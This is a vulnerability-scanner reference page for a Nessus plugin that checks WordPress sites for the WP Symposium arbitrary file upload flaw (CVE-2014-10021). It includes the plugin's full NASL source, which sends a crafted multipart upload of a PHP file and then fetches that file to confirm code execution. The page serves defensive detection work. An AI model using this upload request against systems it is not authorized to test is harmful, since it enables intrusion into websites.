WP Symposium Plugin Arbitrary File Upload - Nessus

Critical   Plugin ID: 105372

This page contains detailed information about the WP Symposium Plugin Arbitrary File Upload Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview


ID: 105372
Name: WP Symposium Plugin Arbitrary File Upload
Filename: wordpress_wp_symposium_upload.nasl
Vulnerability Published: 2014-12-15
This Plugin Published: 2017-12-19
Last Modification Time: 2019-11-12
Plugin Version: 1.6
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: wordpress_detect.nasl
Required KB Items [?]: installed_sw/WordPress, www/PHP

Vulnerability Information


Severity: Critical
Vulnerability Published: 2014-12-15
Patch Published: 2014-12-11
CVE [?]: CVE-2014-10021
CPE [?]: cpe:/a:wordpress:wordpress

Synopsis

The remote web server is running a PHP application that is affected by a file upload vulnerability

Description

The WP Symposium Plugin for WordPress running on the remote web server is affected with an remote file upload vulnerability. A remote, unauthenticated attacker can exploit this vulnerability, via a specially crafted request, allowing an attacker to execute arbitrary code on the target web application.

Solution

Upgrade the WP Symposium Plugin for WordPress to version 14.12 or later and review the /plugins/wp-symposium/server/php directory and subdirectories for malicious content

Public Exploits


Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Exploit-DB)
Exploit Ease: No exploit is required

Here's the list of publicly known exploits and PoCs for verifying the WP Symposium Plugin Arbitrary File Upload vulnerability:

  1. Exploit-DB: exploits/php/remote/35778.rb
    [EDB-35778: WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS Score Source [?]: CVE-2014-10021
CVSS V2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:POC/RL:OF/RC:C
CVSS Base Score:7.5 (High)
Impact Subscore:6.4
Exploitability Subscore:10.0
CVSS Temporal Score:5.9 (Medium)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:5.9 (Medium)
CVSS V3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C
CVSS Base Score:10.0 (Critical)
Impact Subscore:6.0
Exploitability Subscore:3.9
CVSS Temporal Score:9.0 (Critical)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:9.0 (Critical)

Go back to menu.

Plugin Source


This is the wordpress_wp_symposium_upload.nasl nessus plugin source code. This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(105372);
  script_version("1.6");
  script_cvs_date("Date: 2019/11/12");

  script_cve_id("CVE-2014-10021");
  script_bugtraq_id(71686);
  script_xref(name:"EDB-ID", value:"35778");

  script_name(english:"WP Symposium Plugin Arbitrary File Upload");
  script_summary(english:"Checks for file upload vulnerability.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server is running a PHP application that is affected
by a file upload vulnerability");
  script_set_attribute(attribute:"description", value:
"The WP Symposium Plugin for WordPress running on the remote web
server is affected with an remote file upload vulnerability. A remote,
unauthenticated attacker can exploit this vulnerability, via a 
specially crafted request, allowing an attacker to execute arbitrary
code on the target web application.");
  script_set_attribute(attribute:"see_also", value:"https://wordpress.org/plugins/wp-symposium/");
  script_set_attribute(attribute:"see_also", value:"https://www.exploit-db.com/exploits/35543");
  script_set_attribute(attribute:"solution", value:
"Upgrade the WP Symposium Plugin for WordPress to version 14.12 or
later and review the /plugins/wp-symposium/server/php directory and
subdirectories for malicious content");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-10021");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/12/15");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/12/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");

app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);
plugin_url = install_url + "wp-content/plugins/wp-symposium/";
vuln_url = "/wp-content/plugins/wp-symposium/server/php/index.php";

plugin = "WP Symposium";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  # Check for the following string in the url indicated below
  regexes[0] = make_list("symposium");
  checks["/wp-content/plugins/wp-symposium/js/wps.js"] = regexes;

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );
}

if (!installed)
  audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");

# Script name variables
time = unixtime();
script  = SCRIPT_NAME - ".nasl" + "-" + time + ".php";

# setting value static while for single instance
payload = script;

# Form  our PHP file to upload
php_shell = '--XnessusX\r\nContent-Disposition: form-data; name="uploader_uid"\n\n1\n--XnessusX\nContent-Disposition: form-data; name="uploader_dir"\n\n./Nessus/\n--XnessusX\nContent-Disposition: form-data; name="uploader_url"\n\n/wp-content/plugins/wp-symposium/server/php\n--XnessusX\nContent-Disposition: form-data; name="files[]"; filename=' + payload + '\nContent-Type: application/x-php\n\n<?php phpinfo();?>\n--XnessusX--\r\n';

# Attempt upload
post_res = http_send_recv3(
  method    : "POST",
  item      : vuln_url,
  data      : php_shell,
  add_headers:
    make_array("Content-Type",
               "multipart/form-data; boundary=XnessusX"),
  port         : port,
  exit_on_fail : TRUE
);

exp_request = http_last_sent_request();

# Try accessing the file we created
upload_loc = "/wp-content/plugins/wp-symposium/server/php/Nessus/" + payload;
payload_loc = install_url + upload_loc;

get_res = http_send_recv3(
  method       : "GET",
  item         : upload_loc,
  port         : port,
  exit_on_fail : TRUE
);

body = get_res[2];
pat = '(?s:<tr><td class="e">System(.+)<td class="e">PHP API)';
match = pregmatch(pattern:pat, string:body);

if (!empty_or_null(match)){
  output = match[0];
  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    request     : make_list(exp_request),
    output      : chomp(output),
    generic     : TRUE,
    rep_extra   : "Manually remove the file created by Nessus: " +  payload_loc
    );
  }
else audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + ' plugin');

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/wordpress_wp_symposium_upload.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\wordpress_wp_symposium_upload.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/wordpress_wp_symposium_upload.nasl

Go back to menu.

How to Run


Here is how to run the WP Symposium Plugin Arbitrary File Upload as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select WP Symposium Plugin Arbitrary File Upload plugin ID 105372.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl wordpress_wp_symposium_upload.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a wordpress_wp_symposium_upload.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - wordpress_wp_symposium_upload.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state wordpress_wp_symposium_upload.nasl -t <IP/HOST>

Go back to menu.

References


BID | SecurityFocus Bugtraq ID: See also: Similar and related Nessus plugins:
  • 35370 - WP-Forum Plugin for WordPress 'forum_feed.php' 'thread' Parameter SQL Injection
  • 123643 - WP Google Maps for WordPress < 7.11.17 Unauthenticated SQL Injection (CVE-2019-10692)
  • 83524 - WP Symposium Plugin for WordPress forum.php 'show' Parameter SQL Injection (Version Check)
  • 83525 - WP Symposium Plugin for WordPress forum.php 'show' Parameter SQL Injection
  • 52543 - WP Forum Server Plugin for WordPress 'topic' Parameter SQL Injection
  • 38925 - WP-Lytebox 'pg' Parameter Local File Inclusion
  • 40592 - WP-Syntax Plugin for WordPress 'apply_filters' function Command Execution
  • 10352 - Netscape Server ?wp-* Publishing Tags Forced Directory Listing
  • 78945 - RHEL 6 : JBoss EWP (RHSA-2013:0195)
  • 78946 - RHEL 5 : JBoss EWP (RHSA-2013:0196)
  • 78947 - RHEL 4 : JBoss EWP (RHSA-2013:0197)
  • 76289 - RHEL 5 / 6 : richfaces in JBoss EWP (RHSA-2013:1043)
  • 78007 - RHEL 4 / 5 / 6 : JBoss EWP (RHSA-2014:1320)
  • 78736 - RHEL 5 / 6 : JBoss EWP (RHSA-2014:1728)
  • 79204 - RHEL 5 / 6 : JBoss EWP (RHSA-2014:1833)
  • 106376 - WordPress < 2.8.3 'wp-admin' Multiple Security Bypass Vulnerabilities
  • 87921 - WordPress < 4.4.1 class-wp-theme.php XSS
  • 69852 - LeagueManager Plugin for WordPress 'wp-admin/admin.php' 'league_id' Parameter SQL Injection
  • 40578 - WordPress < 2.8.4 'wp-login.php' 'key' Parameter Remote Administrator Password Reset (uncredentialed check)
  • 140211 - WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution
  • 118935 - WordPress Plugin 'WP GDPR Compliance' < 1.4.3 Privilege Escalation
  • 64245 - Portable phpMyAdmin Plugin for WordPress 'wp-pma-mod' Authentication Bypass
  • 24014 - WordPress Trackback 'wp-trackback.php' 'tb_id' Parameter SQL Injection
  • 58274 - WordPress ToolsPack Plugin Backdoor

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file wordpress_wp_symposium_upload.nasl version 1.6. For more plugins, visit the Nessus Plugin Library.

Go back to menu.